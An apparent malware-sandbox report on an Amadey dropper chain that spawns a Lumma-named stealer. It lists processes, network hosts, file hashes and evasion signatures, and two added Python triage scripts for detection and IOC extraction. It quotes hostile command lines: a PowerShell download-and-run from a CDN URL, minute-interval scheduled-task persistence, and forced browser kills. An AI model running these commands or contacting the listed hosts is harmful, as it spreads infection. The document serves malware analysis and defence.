C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
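The process list above is the whole chain in one screen: the sample copies itself to Temp\7af68cdb52\axplons.exe (same SHA-256, per the Files section), axplons.exe launches Newoff.exe, which registers a scheduled task that re-runs it from Temp every minute, and lumma1234.exe, which starts an argument-less RegAsm.exe (the SetThreadContext and WriteProcessMemory rows show RegAsm being used as an injection host); Newoff.exe also runs vpn-1002.exe, whose batch file pulls i0.exe with PowerShell, an Inno Setup installer run /verysilent that packs browser extensions with chrome.exe --pack-extension and force-kills Chrome and Edge. The following is an added example, not part of the report or the sandbox's tooling: a Python triage that encodes those behaviours as rules over process-creation events. The events are constructed from the command lines above, with parent PIDs taken from the WriteProcessMemory rows; the root process's parent PID and the field names (pid, ppid, image, cmdline) are assumptions.

```python
"""Process-event triage for the chain shown under "Processes".

Added example, not part of the sandbox report. Events are constructed from
the report's command lines; ppid values follow its "PID X wrote to memory
of Y" rows. Field names and the root's parent PID are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


TEMP = r"C:\Users\Admin\AppData\Local\Temp"
TEMP_MARK = "\\appdata\\local\\temp\\"          # substring test on lower-cased strings
SAMPLE = "3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"
# .NET utilities commonly used as injection hosts; RegAsm.exe is the one in this report.
INJECTION_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}


def _ev(pid, ppid, image, cmdline=None):
    """Build an event; cmdline=None means the image was run quoted with no arguments."""
    return ProcEvent(pid, ppid, image, cmdline if cmdline is not None else f'"{image}"')


# Constructed sample (not a sandbox export); ppid 1000 for the root is invented.
EVENTS = [
    _ev(3740, 1000, TEMP + "\\" + SAMPLE),
    _ev(3112, 3740, TEMP + r"\7af68cdb52\axplons.exe"),
    _ev(2896, 3112, TEMP + r"\1000066001\Newoff.exe"),
    _ev(3768, 2896, r"C:\Windows\SysWOW64\schtasks.exe",
        '"C:\\Windows\\System32\\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe '
        '/TR "' + TEMP + '\\1000066001\\Newoff.exe" /F'),
    _ev(2040, 2896, TEMP + r"\1000271001\vpn-1002.exe"),
    _ev(3680, 3112, TEMP + r"\1000067001\lumma1234.exe"),
    _ev(1436, 3680, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"),
    _ev(2876, 2040, r"C:\Windows\SysWOW64\cmd.exe", '"cmd" /c "' + TEMP + '\\nsm4C6C.tmp\\abc.bat"'),
    _ev(4916, 2876, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -Command \"(New-Object Net.WebClient).DownloadFile("
        "'https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')\""),
    _ev(3672, 2876, TEMP + r"\i0.exe", "i0.exe /verysilent /sub=1000"),
    _ev(4984, 1204, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        '"C:\\Program Files\\Google\\Chrome\\Application/chrome.exe" --pack-extension='
        + TEMP + '\\is-22S8A.tmp\\xbweti'),
    _ev(4032, 5076, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /f /im "msedge.exe"'),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has_args(ev):
    return ev.cmdline.strip().strip('"').lower() != ev.image.lower()


def classify(ev, parent=None):
    """Return the rule names this event trips (empty list if none)."""
    name, cl, hits = _basename(ev.image), ev.cmdline.lower(), []
    from_temp = TEMP_MARK in ev.image.lower()
    if name == "schtasks.exe" and "/create" in cl and "/sc minute" in cl and TEMP_MARK in cl:
        hits.append("persistence: minute-interval scheduled task pointing into Temp")
    if name == "powershell.exe" and "net.webclient" in cl and "downloadfile" in cl:
        hits.append("download: PowerShell WebClient.DownloadFile")
    if name == "taskkill.exe" and "/f" in cl and re.search(r'/im\s+"?(chrome|msedge)\.exe', cl):
        hits.append("evasion: force-kills a browser")
    if name == "chrome.exe" and "--pack-extension=" in cl and TEMP_MARK in cl:
        hits.append("browser: packs an extension from Temp")
    if from_temp and re.search(r"/verysilent\b", cl):
        hits.append("installer: silent Inno Setup run from Temp")
    if (name in INJECTION_HOSTS and not _has_args(ev)
            and parent is not None and TEMP_MARK in parent.image.lower()):
        hits.append("injection: argument-less .NET utility spawned by a Temp binary")
    return hits


def triage(events):
    """Map pid -> rule hits for every event that tripped at least one rule."""
    by_pid = {e.pid: e for e in events}
    return {e.pid: h for e in events if (h := classify(e, by_pid.get(e.ppid)))}


def chain(events, pid):
    """Ancestry of a flagged process as image basenames, child first."""
    by_pid, out = {e.pid: e for e in events}, []
    while pid in by_pid:
        out.append(_basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return out


if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, " <- ".join(chain(EVENTS, pid)), hits)
```

The injection rule is the one worth a second look: RegAsm.exe with no arguments is not malicious on its own, so the rule only fires when the parent lives in a user Temp directory, which is exactly the pairing the report's SetThreadContext row shows (lumma1234.exe into RegAsm.exe). The sample, axplons.exe and Newoff.exe themselves trip nothing here; they are caught by the task they create and by the hash and path indicators elsewhere in the report.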

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
RU 5.42.96.7:80 5.42.96.7 tcp
NL 23.62.61.97:443 www.bing.com tcp
DE 185.172.128.19:80 185.172.128.19 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 7.96.42.5.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 d2csnxzxwctx26.cloudfront.net udp
GB 18.244.183.212:443 d2csnxzxwctx26.cloudfront.net tcp
US 8.8.8.8:53 212.183.244.18.in-addr.arpa udp
US 8.8.8.8:53 145.178.204.143.in-addr.arpa udp
US 8.8.8.8:53 113.216.138.108.in-addr.arpa udp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 172.67.146.92:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 museumtespaceorsp.shop udp
US 172.67.184.107:443 museumtespaceorsp.shop tcp
US 8.8.8.8:53 92.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 104.21.45.202:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 averageaattractiionsl.shop udp
US 172.67.220.163:443 averageaattractiionsl.shop tcp
US 8.8.8.8:53 d22hce23hy1ej9.cloudfront.net udp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 8.8.8.8:53 femininiespywageg.shop udp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 8.8.8.8:53 202.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 107.184.67.172.in-addr.arpa udp
US 8.8.8.8:53 163.220.67.172.in-addr.arpa udp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 172.67.203.218:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
US 172.67.131.36:443 stalfbaclcalorieeis.shop tcp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 8.8.8.8:53 3.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 218.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 147.246.224.13.in-addr.arpa udp
US 8.8.8.8:53 cdn-edge-node.com udp
US 172.67.165.254:443 cdn-edge-node.com tcp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 172.67.197.146:443 civilianurinedtsraov.shop tcp
US 8.8.8.8:53 36.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 146.197.67.172.in-addr.arpa udp
US 8.8.8.8:53 adblock2024.shop udp
US 104.21.43.83:443 adblock2024.shop tcp
US 8.8.8.8:53 254.165.67.172.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 8.8.8.8:53 240429000936002.mjt.kqri92.top udp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
US 8.8.8.8:53 83.43.21.104.in-addr.arpa udp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 52.211.130.173:443 checkip.amazonaws.com tcp
US 8.8.8.8:53 76.35.156.94.in-addr.arpa udp
US 8.8.8.8:53 rep.pe-wok.biz udp
SE 46.21.101.120:80 rep.pe-wok.biz tcp
US 8.8.8.8:53 173.130.211.52.in-addr.arpa udp
US 8.8.8.8:53 120.101.21.46.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
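Most of the table above is detonation background: reverse (in-addr.arpa) lookups the sandbox makes for every address it sees, Bing traffic from the Windows image, and the checkip.amazonaws.com call the report already flags as an external-IP lookup. What a responder needs out of it is the short list of hosts the sample itself talked to. The following is an added example, not part of the report: a Python filter that drops DNS and reverse-lookup rows, sets allow-listed background domains aside, and leaves named hosts and direct-to-IP connections as IOC candidates. NETWORK_ROWS is a constructed excerpt of the table above in the same four-column layout; the allow-list and the category names are this example's own choices and would be tuned per sandbox image.

```python
"""Split a sandbox Network table into background noise and IOC candidates.

Added example, not part of the report. NETWORK_ROWS is a constructed excerpt
of the report's table (country, destination, domain, protocol).
"""
import ipaddress

NETWORK_ROWS = """\
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
RU 5.42.96.7:80 5.42.96.7 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
GB 18.244.183.212:443 d2csnxzxwctx26.cloudfront.net tcp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 172.67.146.92:443 roomabolishsnifftwk.shop tcp
US 172.67.184.107:443 museumtespaceorsp.shop tcp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 172.67.165.254:443 cdn-edge-node.com tcp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
IE 52.211.130.173:443 checkip.amazonaws.com tcp
SE 46.21.101.120:80 rep.pe-wok.biz tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
"""

# Background traffic seen in most Windows detonations; extend per sandbox image.
BENIGN_SUFFIXES = ("bing.com", "bing.net", "google.com", "microsoft.com", "windowsupdate.com")
IP_CHECK_HOSTS = {"checkip.amazonaws.com"}


def parse_rows(text):
    """Parse 'country ip:port domain proto' lines; anything else is skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        host, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": host, "port": int(port),
                     "domain": domain.lower(), "proto": proto})
    return rows


def _is_ip(s):
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


def _benign(domain):
    return any(domain == s or domain.endswith("." + s) for s in BENIGN_SUFFIXES)


def triage_network(text):
    """Bucket unique (domain, ip, port, proto) tuples; DNS and PTR rows are dropped."""
    buckets = {"candidate": [], "direct_ip": [], "ip_check": [], "benign": []}
    seen = set()
    for r in parse_rows(text):
        key = (r["domain"], r["ip"], r["port"], r["proto"])
        if key in seen or r["port"] == 53 or r["domain"].endswith(".in-addr.arpa"):
            continue
        seen.add(key)
        if _benign(r["domain"]):
            buckets["benign"].append(r)
        elif r["domain"] in IP_CHECK_HOSTS:
            buckets["ip_check"].append(r)
        elif _is_ip(r["domain"]):          # connection made to a literal address, no name
            buckets["direct_ip"].append(r)
        else:
            buckets["candidate"].append(r)
    return buckets


def ioc_lines(buckets):
    """Flat indicator list: domains for named hosts, ip:port for direct-to-IP traffic."""
    out = [f"domain:{r['domain']}" for r in buckets["candidate"]]
    out += [f"ip:{r['ip']}:{r['port']}" for r in buckets["direct_ip"]]
    return sorted(set(out))


if __name__ == "__main__":
    b = triage_network(NETWORK_ROWS)
    print("\n".join(ioc_lines(b)))
    print(f"{len(b['benign'])} benign and {len(b['ip_check'])} IP-check rows kept out of the IOC list")
```

Two caveats before the output goes into a blocklist. The cloudfront.net names are shared CDN distributions: d22hce23hy1ej9.cloudfront.net is where the PowerShell lines above fetched the payload, so the distribution name is an indicator, but the CDN is not. And because port-53 rows are dropped, a domain the sample resolved but never connected to (a dead or sinkholed C2) disappears; keep the DNS rows as a separate bucket if you want those as well.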

Files

memory/3740-0-0x0000000000690000-0x0000000000B62000-memory.dmp

memory/3740-1-0x0000000077434000-0x0000000077436000-memory.dmp

memory/3740-2-0x0000000000691000-0x00000000006BF000-memory.dmp

memory/3740-3-0x0000000000690000-0x0000000000B62000-memory.dmp

memory/3740-5-0x0000000000690000-0x0000000000B62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

MD5 f6986f363dde0d5f374abd0a1dac252b
SHA1 4665c53ed2ce6bd84572fc398967d11421e00bab
SHA256 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512 733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201

memory/3740-17-0x0000000000690000-0x0000000000B62000-memory.dmp

memory/3112-18-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-19-0x0000000000021000-0x000000000004F000-memory.dmp

memory/3112-20-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-21-0x0000000000020000-0x00000000004F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe

MD5 ccb630a81a660920182d1c74b8db7519
SHA1 7bd1f7855722a82621b30dd96a651f22f7b0bf8a
SHA256 a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
SHA512 8fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811

C:\Users\Admin\AppData\Local\Temp\nsm4C6C.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe

MD5 c4ffab152141150528716daa608d5b92
SHA1 a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256 c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512 a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

memory/3680-83-0x0000000000950000-0x0000000000951000-memory.dmp

memory/1436-86-0x0000000000400000-0x0000000000455000-memory.dmp

memory/1436-82-0x0000000000400000-0x0000000000455000-memory.dmp

memory/3680-81-0x0000000000950000-0x0000000000951000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsm4C6C.tmp\abc.bat

MD5 f79d850a439815f276773a85f654511d
SHA1 42c4b202b7122ce48bb17975cf0a5be337d09fec
SHA256 31b4234965ffbff8d8a2d9dc8876d2edb1ba4eb44f482fedad5ed16284f872ff
SHA512 5ea67fac41596652b0eeaf1f8d4e01fb6d2f2495c7e7185c22e7cac5187d3fc5d02e1649710c0ef30419c6b2805c4d947cf39eab5f31d8f0b72cf3e37e3a507c

memory/4916-88-0x0000000002A50000-0x0000000002A86000-memory.dmp

memory/4916-89-0x0000000005160000-0x0000000005788000-memory.dmp

memory/4916-90-0x0000000005790000-0x00000000057B2000-memory.dmp

memory/4916-91-0x0000000005930000-0x0000000005996000-memory.dmp

memory/4916-92-0x00000000059A0000-0x0000000005A06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kofvsthe.xri.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4916-102-0x0000000005A10000-0x0000000005D64000-memory.dmp

memory/4916-103-0x0000000005FF0000-0x000000000600E000-memory.dmp

memory/4916-104-0x0000000006030000-0x000000000607C000-memory.dmp

memory/4916-105-0x0000000007630000-0x0000000007CAA000-memory.dmp

memory/4916-106-0x00000000064E0000-0x00000000064FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/3000-119-0x0000000006300000-0x0000000006654000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 58b91f03dfc4cf14af464d97ede94660
SHA1 ee65d8bbed1a2599db87825126549af9bb905e98
SHA256 609b4f96bd072252827a12871f585426d219fb7e51430e339fcee44ef3e2f74f
SHA512 b942f447ffb08149711def4281e87f5a9234271a6e2b198802f1560cbea4385e72e593bbdabc4e984f2bf520b55a28be03250f3668a0f8b00229000cf44965c9

C:\Users\Admin\AppData\Local\Temp\i0.exe

MD5 b80362872ea704846e892f16aab924c3
SHA1 222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256 d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512 beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5

memory/3672-125-0x0000000000400000-0x00000000004E9000-memory.dmp

memory/4548-129-0x00000000058A0000-0x0000000005BF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp

MD5 bdf5432c7470916ab3c25f031c4c8d76
SHA1 4762eeae811cfad7449a3d13fb1d759932c6d764
SHA256 72f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903
SHA512 33ff33582f75a67602233860d3057122a4f893d3ec3b58204617660ec46d1afd25657047f364c06f727e1604907e9cb740dc847b992249d0656100308c4bedde

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3081bd6181939301db545828ec689f19
SHA1 79c197e0c874f76999589e7f670cfbf4449140d3
SHA256 40e70d07d34f7e65cf9d8035bd0e575fd526e4f7d8765bfdebbfcd5143b089a6
SHA512 bc784dbeb23c34f4aebf99f2654e8db7c53689f5c903830ed9aad5e905884a7f882c9b1ffafb5683180a096897db2e0c8be9a0b122929788227492006dbf4756

memory/4548-143-0x0000000006440000-0x000000000648C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\chrome.zip

MD5 52311257a997455c0a32e1679e0b614e
SHA1 395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA256 50a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA512 19488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti\js\background.js

MD5 432c4c1300ba1c077fbd681f9667a104
SHA1 33482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256 adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
SHA512 0ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti\icons\icon-34.png

MD5 ca00972a17d51a3e6a28cfc8711474e4
SHA1 c806ba3bcfb0b785aa4804843d332f425c66b7e0
SHA256 fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA512 9731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti\icons\icon-128.png

MD5 d57a101cf48bd00b5297596c081ece42
SHA1 47be9ca3d2a57788957bb6f91d9a6886c4252c0f
SHA256 a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA512 7110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti\manifest.json

MD5 1d47eb945d1299c0e53bcada476d32b3
SHA1 509f9041f7e2a14402915feb4f2a739cfac5636b
SHA256 0a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a
SHA512 6d20d3855225ee48373ee1ae19d5cecf90951a507c9c1d23d86fe0bb4f73def9545f0fd18ce821a3d63fa636b06d08a52a41c0f3a3cb2edc20d8ef92919b4258

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\dlls.manifest

MD5 963fb7657217be957d7d4732d892e55c
SHA1 593578a69d1044a896eb8ec2da856e94d359ef6b
SHA256 1d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512 f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\edge.zip

MD5 11a38af0ad330d95d2fb709612a44fa5
SHA1 bc173e51491e8ddbd88d35d03a88d91e47f4dc54
SHA256 0d82a391c8676e5bc07f7e91da281ad338a9cea8130f4ee81949fa418cc19970
SHA512 4bc5d99e14892b5f88ea15da5b6d02cd8131bf25e2990cdc1f88accca2cb984a547e58ac850fe15323d4a5752e0194ecea73acfb2cbab6769ac06e9002d4bad9

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\shlwapi.dll

MD5 4cac70c3fdb075424b58b220b4835c09
SHA1 651e43187c41994fd8f58f11d8011c4064388c89
SHA256 4094f54853d9eea9fb628e2207cd95042bae089711908d1c8ed189fad9448e2b
SHA512 810e97be3d47c67449a6049b52578f4f8dd829b62d015dde39c2a2381c481625540f945e06224b9c74e0deac089f6cd352f53343170138778c1f9e62e7518963

memory/3112-347-0x0000000000020000-0x00000000004F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti.pem

MD5 261f4bbd673d2fabfcdc46bc6d3ed476
SHA1 ef4dcdf1d1a7b34ac6150eba577f359adec3cd38
SHA256 5116e02d1641a0d9c6faed1161c81befb05d8bc0d99f7854b237b3cd4761a5ea
SHA512 2d3550dee24cdf756a05083be3fec627089f7e5e4bc6ff9e304a82d03392a57f588fe5cd9cf2c51e6982e1ac199a1d61044b837db333ed01944f9e0b365affce

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti.crx

MD5 931e9d91cc7969c1dcc0529135556b2f
SHA1 55c8efcf98411783fc351957cefbd3228882e99d
SHA256 0f9c5676c1f2db6aa3cbd378bef4719c7c86fce24200aa4d92ba6298291cf8a9
SHA512 9d1a0680c2c7a14169d896b7ce267ef3f67db79d897df1df3f5b06ab42e3addd7b013a5f0c5285d6aa816fa3c2644dc64c0f72e442c74ac7f1e24ae500685a15

memory/5076-371-0x0000000000400000-0x000000000072C000-memory.dmp

memory/3672-372-0x0000000000400000-0x00000000004E9000-memory.dmp

memory/3112-373-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-374-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-375-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-376-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/2260-378-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/2260-380-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-382-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-383-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-384-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-385-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-386-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-387-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/4748-390-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-391-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-392-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-393-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-394-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-395-0x0000000000020000-0x00000000004F2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-19 18:50

Reported

2024-05-19 18:52

Platform

win11-20240426-en

Max time kernel

143s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
